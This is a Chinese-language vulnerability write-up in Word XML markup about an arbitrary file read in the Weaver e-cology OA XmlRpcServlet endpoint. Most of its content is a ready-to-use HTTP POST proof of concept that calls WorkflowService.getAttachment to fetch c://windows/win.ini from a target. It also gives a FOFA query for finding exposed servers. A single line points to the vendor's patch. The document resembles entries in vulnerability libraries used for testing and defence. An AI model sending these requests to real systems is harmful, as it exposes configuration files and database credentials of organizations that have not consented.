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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛微e-cology XmlRpcServlet文件读取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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泛微e-cology XmlRpcServlet接口处存在任意文件读取漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件等，导致网站处于极度不安全状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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app="泛微-OA（e-cology）"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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解码如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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POC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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 /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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Host: your-ip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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Content-Type: application/xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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Accept-Encoding: gzip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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Content-Length: 201</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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&lt;methodCall&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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&lt;methodName&gt;WorkflowService.getAttachment&lt;/methodName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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&lt;params&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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&lt;param&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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&lt;value&gt;&lt;string&gt;c://windows/win.ini&lt;/string&gt;&lt;/value&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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&lt;/param&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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&lt;/params&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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&lt;/methodCall&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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47005" cy="2763520"/>
            <wp:effectExtent l="0" t="0" r="10795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2763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base64解密如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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56530" cy="2134870"/>
            <wp:effectExtent l="0" t="0" r="1270" b="139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134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1、官方已修复该漏洞，请用户联系厂商修复漏洞：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"https://www.weaver.com.cn/cs/securityDownload.html"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https://www.weaver.com.cn/cs/securityDownload.html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643B15"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D8643B1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0F7D0A9A"/>
    <w:rsid w:val="2EBB27F1"/>
    <w:rsid w:val="46767CC9"/>
    <w:rsid w:val="6E0D29FF"/>
    <w:rsid w:val="7255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2023-12-12T09:02:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-13T07:01:33Z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F03BBA89A6B942539AADA3FDD8D88DE6_12</vt:lpwstr>
  </property>
</Properties>
</file>